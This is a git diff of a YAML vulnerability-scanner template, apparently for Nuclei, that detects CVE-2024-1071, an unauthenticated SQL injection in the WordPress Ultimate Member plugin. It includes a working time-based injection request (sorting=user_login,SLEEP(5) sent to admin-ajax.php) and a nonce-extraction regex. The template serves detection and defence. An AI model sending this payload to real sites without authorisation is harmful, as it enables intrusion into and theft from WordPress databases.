Update CVE-2024-1071.yaml
parent
7edd34fc38
commit
8e28c9dde9
|
@ -1,15 +1,18 @@
|
|||
id: CVE-2024-1071
|
||||
|
||||
info:
|
||||
name: WordPress Ultimate Member 2.1.3 – 2.8.2 – Unauthenticated SQL Injection
|
||||
name: WordPress Ultimate Member 2.1.3 - 2.8.2 – SQL Injection
|
||||
author: DhiyaneshDK,iamnooob
|
||||
severity: critical
|
||||
description: |
|
||||
The Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the ‘sorting’ parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
|
||||
The Ultimate Member - User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the ‘sorting’ parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
|
||||
remediation: Fixed in 2.8.3
|
||||
reference:
|
||||
- https://www.wordfence.com/blog/2024/02/2063-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-ultimate-member-wordpress-plugin/
|
||||
- https://securityonline.info/cve-2024-1071-wordpress-ultimate-member-plugin-under-active-attack/
|
||||
classification:
|
||||
cve-id: CVE-2024-1071
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 2
|
||||
|
@ -26,11 +29,10 @@ http:
|
|||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
@timeout: 10s
|
||||
POST /wp-admin/admin-ajax.php?action=um_get_members HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Referer: {{RootURL}}/wp-admin/admin.php?page=um_options
|
||||
|
||||
directory_id=b9238&sorting=user_login,SLEEP(5)&nonce={{nonce}}
|
||||
|
||||
|
@ -46,9 +48,9 @@ http:
|
|||
|
||||
extractors:
|
||||
- type: regex
|
||||
internal: true
|
||||
name: nonce
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- '"nonce":"([0-9a-z]+)"'
|
||||
internal: true
|
||||
|
|
Loading…
Reference in New Issue